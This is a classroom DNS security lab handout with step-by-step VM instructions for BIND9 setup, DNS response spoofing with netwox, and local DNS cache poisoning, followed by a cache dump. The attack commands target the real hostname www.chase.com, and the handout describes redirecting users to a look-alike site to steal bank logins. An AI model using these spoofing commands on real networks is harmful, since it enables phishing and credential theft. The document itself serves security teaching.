DNS LAB

1- Run Three (3) Virtual Machines (VM): Server (this will be the DNS Server), Client
and Attacker

2- Get the ipaddress of each VM using the command ifconfig command and register that
address

# remember the IP address for each machine for future use

$ Server IP: 10.0.2.6
$ Client IP: 10.0.2.5
$ Attacker IP: 10.0.2.7

3- The “example.com” domain name is reserved for use in documentation and educational
purposes, and is not owned by anybody, so it is safe to use it for attacks.

====================================================================================

Task 1: modify the /etc/hosts file on the Client machine

1.1 $ sudo gedit /etc/hosts

1.2 Add the following line to /etc/hosts file

127.0.0.1 www.syr.edu

1.3 Save and then run the browser and type www.syr.edu
You should see the local server and not the Syracuse University server

1|P A G E ISAURA LOPEZ

 DNS LAB

1.4 You may also want to try to put the IP address of facebook.com for www.syr.edu
and save. When you type www.syr.edu in the URL, the facebook page will be shown (You
need to clear the history of the browser)

Task 2: Setup the machine that the user will ask for the IP **on Client machine**
2.1 Go to System Settings (from the left bar or search for System Setting)

2.2 Click "System Settings" -> "Network"

2.3 Click "Options" in "Wired" Tab

2.4 Select "IPv4 Settings" -> "Method" ->"Automatic(DHCP) Addresses Only" and update
only "DNS Servers" entry with IP address of the DNS Server (your server).

2.5 Click the "Network Icon” on the top right corner and Select "Wired Connection X".
This will refresh the wired network connection and updates the changes.

2.6 Linux command (given domain name and ask for its IP) **on user machine**

$ dig www.example.com

2|P A G E ISAURA LOPEZ

 DNS LAB

2.7 Open www.example.com in a web browser

Task 3: Setup the victim **local DNS sever***

 We will work on the server VM
 All virtual machines have BIND9 (Open Source DNS Server). It can be installed
on a Linux-based machine using the command $ sudo apt-get install bind9 (if
you do not have it)
 You are given example.com.db file. This is the zone file. The actual DNS
resolution is put in the zone file

3.1 copy example.com.db to the folder /var/cache/bind/ on the server VM

3.1.1 You can copy the file into your home directory in the VM

3.1.2 $ sudo cp example.com.db /var/cache/bind/

3.1.3 Open the file example.com.db to see how it looks like

$ sudo gedit /var/cache/bind/example.com.db

3|P A G E ISAURA LOPEZ

 DNS LAB

3.2 Link the configuration file to example.com.db

3.2.1 Type the command in the terminal to modify the file
/etc/bind/named.conf.local

$ sudo gedit /etc/bind/named.conf.local

3.2.2 Add the 4 lines at the end.

zone "example.com" {
type master;
file "/var/cache/bind/example.com.db";
};

3.2.3 Save and exit the text editor

3.3 Restart the bind9 to make the changes take effect.

$ sudo service bind9 restart

3.4 Verify from the USER VM, type the command to query IP for www.example.com

$ dig www.example.com

4|P A G E ISAURA LOPEZ

 DNS LAB

Task 4: Directly Sniffing & Spoofing DNS Requests to User

Notes
 The server machine has not been compromised, so attackers cannot directly
change the DNS query process. However, if attackers are on the same local area
network as the victim, they can still achieve a great damage.
 When a user types the name of a web site (a host name, such as
www.example.com) in a web browser, the user’s computer will issue a DNS
request to the DNS server to resolve the IP address of the host name. After
hearing this DNS request, the attackers can spoof a fake DNS response

4.1 Sniffing and spoofing can be done using www.example.com, but we would like to
deal with some more interesting URLs like www.chase.com

4.2 Run the following command on the attacker machine

$ sudo netwox 105 --hostname "www.chase.com"-hostnameip 157.240.17.35 –authns

"ns.facebook.com" --authnsip 157.240.17.35

4.3 From the user machine, open Firefox and type www.chase.com (do not forget www),
what do you see?!!

5|P A G E ISAURA LOPEZ

 DNS LAB

Notes
 105: is the module to sniff and send DNS answers
 This attack will sniff the users trying to access www.chase.com and forward
them to facebook.com (IP address 157.240.17.35)
 For harmful attacks, the attacker will generate a malicious website that is
very similar to www.chase.com and will forward users to that malicious web
site to get their user names and passwords for chase bank

4.4 Stop the attack on the attacker side using Ctrl+c

4.5 Clear the history of Firefox on the user machine (may be you need to close and
reopen it). Then, browse to www.chase.com

6|P A G E ISAURA LOPEZ

 DNS LAB

Task 5 Local DNS cache poisoning

Notes
 The above attack targets the user’s machine. In order to achieve long-lasting
effect, every time the user’s machine sends out a DNS query for www.chase.com
(or www.exampe.com), the attacker’s machine must send out a spoofed DNS
response. This might not be so efficient; there is a much better way to
conduct attacks by targeting the DNS server (the Server VM), instead of the
user’s machine.
 When a DNS server (assume) Apollo receives a query, if the host name is not
within the Apollo’s domain, it will ask other DNS servers to get the host name
resolved. Note that in our lab setup, the domain of our DNS server is
example.com; therefore, for the DNS queries of other domains (e.g.
www.google.com, www.chase.com), the DNS server Apollo will ask other DNS
servers. However, before Apollo asks other DNS servers, it first looks for the
answer from its own cache; if the answer is there, the DNS server Apollo will
simply reply with the information from its cache. If the answer is not in the
cache, the DNS server will try to get the answer from other DNS servers. When
Apollo gets the answer, it will store the answer in the cache, so next time,
there is no need to ask other DNS servers.
 Therefore, if attackers can spoof the response from other DNS servers, Apollo
will keep the spoofed response in its cache for certain period of time. Next
time, when a user’s machine wants to resolve the same host name, Apollo will
use the spoofed response in the cache to reply. This way, attackers only need
to spoof once, and the impact will last until the cached information expires.
This attack is called DNS cache poisoning.

5.1 On the Server machine, update the named.conf.options file

 The DNS server needs to read the file /etc/bind/named.conf configuration file
to start.
 This configuration file usually include an option file called
/etc/bind/named.conf.options

5.2 Open the file /etc/bind/named.conf to see the include part for
/etc/bind/named.conf.options

$ sudo gedit /etc/bind/named.conf

5.3 Open the file /etc/bind/named.conf.options

$ sudo gedit /etc/bind/named.conf.options

5.4 Make the following modifications to the option file /etc/bind/named.conf.options

a) Disable the DNSSEC protection. This protection will defeat all the sniff &
spoof attack with PKI technique. Commenting dnssec-validation and set dnssec-
enable to no

7|P A G E ISAURA LOPEZ

 DNS LAB

#dnssec-validation auto;
dnssec-enable no; //(do not forget the semi-colon “;”)

b) Give the path for the dump file

dump-file "/var/cache/bind/dump.db"; //(do not forget the semi-colon

“;”)

c) Your file should look like (image removed for space)

//Note: The file /var/cache/bind/dump.db is used to dump DNS server’s cache

5.5 Restart the DNS server

$ sudo service bind9 restart

//If you have seen [fail], that means your named.conf.options file has an
error. You have to fix it first

5.6 Flush the cache of the server everytime before the attack. On the server machine
type:
$ sudo rndc flush

8|P A G E ISAURA LOPEZ

 DNS LAB

5.7 On the attacker machine, run the following command

$ sudo netwox 105 --hostname "www.example.net"-hostnameip 10.20.30.40 --authns

"ns.example.net" --authnsip 10.20.30.50 --ttl 19000 --filter "src host
<YOUR_SERVER IP>" --spoofip "raw"

#!!!!!! Please replace < YOUR_SERVER IP > by your own server's IP address

5.8 On the client machine query the IP address of www.example.net

$ dig www.example.net

5.9 Close the attack on the attacker machine

5.10 Dig again on the client machine

$ dig www.example.net

5.11 Update the cache on the server machine

$ sudo rndc dumpdb -cache

5.12 Open the dump file to see the cache

9|P A G E ISAURA LOPEZ

 DNS LAB

$ gedit /var/cache/bind/dump.db

;
; Start view _default
;
;
; Cache dump of view '_default' (cache _default)
;
$DATE 20170928025741
; authanswer
. 18876 IN NS ns.example.net.
; authanswer
daisy.ubuntu.com. 18876 A 10.20.30.40
; glue
net. 172685 NS a.gtld-servers.net.
172685 NS b.gtld-servers.net.
172685 NS c.gtld-servers.net.
172685 NS d.gtld-servers.net.
172685 NS e.gtld-servers.net.
172685 NS f.gtld-servers.net.
172685 NS g.gtld-servers.net.
172685 NS h.gtld-servers.net.
172685 NS i.gtld-servers.net.
172685 NS j.gtld-servers.net.
172685 NS k.gtld-servers.net.
172685 NS l.gtld-servers.net.
172685 NS m.gtld-servers.net.
; additional
86285 DS 35886 8 2 (
7862B27F5F516EBE19680444D4CE5E762981
931842C465F00236401D8BD973EE )
; additional
86285 RRSIG DS 8 1 86400 20171010170000 (
20170927160000 15768 .
Ye+alvhPHIcEjtWI5H9kf+5xuzDE3VbtT6IH
LhQrqCDyWiijw5cgGqfNfmMqRHbbasccH6IY
7/B9ig+911zDcclgR9SrbhR3/JStYj9kO6oJ
PjFmhaLvdCICbn3mstoPH0QUmU04Cf0CL1or
NfGlP/FLE/c8vzy1o3Eqekb9wz9cntPFL/Pp
fdJpgh+WOcHz4uIRHYY6zh8UH8aghUMXkkYH
toXYi87yVbrdR3x1d8yvSq2dCs1+I/QUT+7D
HJYmLFW0in0Em7GRYaoTbuskqV+l0rAS8WUI
UoXcsr5Z5fih+nfMJ1bkU2GlO8zb828QCS4X
o8bmYx83S8Edm4MeKQ== )
; glue
example.net. 172685 NS a.iana-servers.net.
172685 NS b.iana-servers.net.
; additional
86285 DS 31589 8 1 (
628FCA4806B2E475DA9FD97A1FB57B7E26F8
494C )
86285 DS 31589 8 2 (
5A9EAEFC7CC7D6946E1D106418427D272D40
6B835BA9EA0219DFBD3974A54A81 )
86285 DS 54761 8 1 (
2B45E49265B30032497E0D61D259F4ACF821
A5A0 )
86285 DS 54761 8 2 (
9FDE7678F418E724ACE98537E0EAD92BB96B
3109072D076A117492DB708CE238 )

10 | P A G E ISAURA LOPEZ
 DNS LAB

86285 DS 61250 8 1 (
EBF5191249B08ADBA60DC57DE26F8D530FE5
D17D )
86285 DS 61250 8 2 (
984E001501B50F8D7B73935E12A0B15E9DCE
5498F0885C3C6193B4DCB8DDAD36 )
; additional
86285 RRSIG DS 8 2 86400 20171004051157 (
20170927040157 57899 net.
KsSzvKKyDXADCdeLAZ3YCsBCbW/bdjVwJ7lP
hK1ZRZRKMulHNANY+Sjo4H489521UF9BLg2f
2DFw329H0OBjIXhxfkq5x7lpcOWni3VWctoU
ef0ENomZ+COUWNjcZ5BzWEd1b8+2hMn12VLg
WKkqw+aoeHEXe1RZgYLHr+R8ezw= )
; authauthority
ns.example.net. 3485 \-ANY ;-$NXDOMAIN
; example.net. SOA sns.dns.icann.org. noc.dns.icann.org. 2017042792 7200 3600 1209600 3600
; example.net. RRSIG SOA ...
; example.net. RRSIG NSEC ...
; example.net. NSEC www.example.net. A NS SOA TXT AAAA RRSIG NSEC DNSKEY
; authanswer
www.example.net. 18885 A 10.20.30.40
; glue
a.gtld-servers.net. 172685 A 192.5.6.30
; glue
172685 AAAA 2001:503:a83e::2:30
; glue
b.gtld-servers.net. 172685 A 192.33.14.30
; glue
172685 AAAA 2001:503:231d::2:30
; glue
c.gtld-servers.net. 172685 A 192.26.92.30
; glue
172685 AAAA 2001:503:83eb::30
; glue
d.gtld-servers.net. 172685 A 192.31.80.30
; glue
172685 AAAA 2001:500:856e::30
; glue
e.gtld-servers.net. 172685 A 192.12.94.30
; glue
172685 AAAA 2001:502:1ca1::30
; glue
f.gtld-servers.net. 172685 A 192.35.51.30
; glue
172685 AAAA 2001:503:d414::30
; glue
g.gtld-servers.net. 172685 A 192.42.93.30
; glue
172685 AAAA 2001:503:eea3::30
; glue
h.gtld-servers.net. 172685 A 192.54.112.30
; glue
172685 AAAA 2001:502:8cc::30
; glue
i.gtld-servers.net. 172685 A 192.43.172.30
; glue
172685 AAAA 2001:503:39c1::30
; glue
j.gtld-servers.net. 172685 A 192.48.79.30

11 | P A G E ISAURA LOPEZ
 DNS LAB

; glue
172685 AAAA 2001:502:7094::30
; glue
k.gtld-servers.net. 172685 A 192.52.178.30
; glue
172685 AAAA 2001:503:d2d::30
; glue
l.gtld-servers.net. 172685 A 192.41.162.30
; glue
172685 AAAA 2001:500:d937::30
; glue
m.gtld-servers.net. 172685 A 192.55.83.30
; glue
172685 AAAA 2001:501:b1f9::30
; glue
a.iana-servers.net. 172685 A 199.43.135.53
; glue
172685 AAAA 2001:500:8f::53
; glue
b.iana-servers.net. 172685 A 199.43.133.53
; glue
172685 AAAA 2001:500:8d::53
;
; Address database dump
;
; ns.example.net [v4 TTL 18885] [v6 TTL 3485] [v4 success] [v6 nxdomain]
; 10.20.30.40 [srtt 238] [flags 00002000] [ttl 1685]
;
; Unassociated entries
;
; 192.31.80.30 [srtt 12] [flags 00000000] [ttl 1685]
; 2001:500:d937::30 [srtt 28] [flags 00000000] [ttl 1685]
; 2001:500:8d::53 [srtt 20] [flags 00000000] [ttl 1685]
; 2001:500:8f::53 [srtt 18] [flags 00000000] [ttl 1685]
; 192.42.93.30 [srtt 29] [flags 00000000] [ttl 1685]
; 192.55.83.30 [srtt 16] [flags 00000000] [ttl 1685]
; 192.112.36.4 [srtt 2] [flags 00000000] [ttl 1685]
; 192.5.6.30 [srtt 9] [flags 00000000] [ttl 1685]
; 192.26.92.30 [srtt 22] [flags 00000000] [ttl 1685]
; 192.43.172.30 [srtt 16] [flags 00000000] [ttl 1685]
; 2001:503:c27::2:30 [srtt 6] [flags 00000000] [ttl 1685]
; 2001:500:856e::30 [srtt 12] [flags 00000000] [ttl 1685]
; 199.7.83.42 [srtt 9] [flags 00000000] [ttl 1685]
; 192.52.178.30 [srtt 22] [flags 00000000] [ttl 1685]
; 2001:503:83eb::30 [srtt 19] [flags 00000000] [ttl 1685]
; 202.12.27.33 [srtt 10] [flags 00000000] [ttl 1685]
; 193.0.14.129 [srtt 18] [flags 00000000] [ttl 1685]
; 192.33.14.30 [srtt 26] [flags 00000000] [ttl 1685]
; 2001:502:8cc::30 [srtt 200000] [flags 00002000] [ttl 1685]
; 192.35.51.30 [srtt 21] [flags 00000000] [ttl 1685]
; 2001:503:a83e::2:30 [srtt 11] [flags 00000000] [ttl 1685]
; 192.48.79.30 [srtt 10671] [flags 00002000] [ttl 1685]
; 2001:502:1ca1::30 [srtt 200000] [flags 00002000] [ttl 1685]
; 192.58.128.30 [srtt 13] [flags 00000000] [ttl 1685]
; 199.43.135.53 [srtt 28] [flags 00000000] [ttl 1685]
; 2001:7fe::53 [srtt 5] [flags 00000000] [ttl 1685]
; 198.41.0.4 [srtt 12] [flags 00000000] [ttl 1685]
; 2001:500:1::803f:235 [srtt 9] [flags 00000000] [ttl 1685]
; 192.41.162.30 [srtt 13] [flags 00000000] [ttl 1685]
; 2001:503:eea3::30 [srtt 26] [flags 00000000] [ttl 1685]

12 | P A G E ISAURA LOPEZ
 DNS LAB

; 2001:503:ba3e::2:30 [srtt 7] [flags 00000000] [ttl 1685]

; 2001:500:3::42 [srtt 9] [flags 00000000] [ttl 1685]
; 2001:7fd::1 [srtt 14] [flags 00000000] [ttl 1685]
; 192.228.79.201 [srtt 25] [flags 00000000] [ttl 1685]
; 2001:500:2f::f [srtt 6] [flags 00000000] [ttl 1685]
; 2001:502:7094::30 [srtt 21] [flags 00000000] [ttl 1685]
; 192.36.148.17 [srtt 14001] [flags 00002000] [ttl 1685]
; 192.203.230.10 [srtt 21] [flags 00000000] [ttl 1685]
; 2001:503:d2d::30 [srtt 10] [flags 00000000] [ttl 1685]
; 192.5.5.241 [srtt 28] [flags 00000000] [ttl 1685]
; 128.63.2.53 [srtt 18] [flags 00000000] [ttl 1685]
; 192.12.94.30 [srtt 17] [flags 00000000] [ttl 1685]
; 2001:503:39c1::30 [srtt 22] [flags 00000000] [ttl 1685]
; 2001:503:d414::30 [srtt 200000] [flags 00002000] [ttl 1685]
; 199.43.133.53 [srtt 13948] [flags 00002000] [ttl 1685]
; 2001:dc3::35 [srtt 24] [flags 00000000] [ttl 1685]
; 192.54.112.30 [srtt 31] [flags 00000000] [ttl 1685]
; 2001:501:b1f9::30 [srtt 30] [flags 00000000] [ttl 1685]
; 128.8.10.90 [srtt 12] [flags 00000000] [ttl 1685]
; 192.33.4.12 [srtt 923] [flags 00002000] [ttl 1685]
; 2001:503:231d::2:30 [srtt 11] [flags 00000000] [ttl 1685]
;
; Bad cache
;
;
; Start view _bind
;
;
; Cache dump of view '_bind' (cache _bind)
;
$DATE 20170928025741
;
; Address database dump
;
;
; Unassociated entries
;
;
; Bad cache
;
; Dump complete

Notes
 You will see ****Bad
cache***
 After stopping the
attack, you may need
to flush the server’s
cache using $ sudo
rndc flush
 After flushing the
cache, you can dig

13 | P A G E ISAURA LOPEZ
 DNS LAB

again on the client side to see correct IP address of www.examaple.net which

is 93.184.216.34

14 | P A G E ISAURA LOPEZ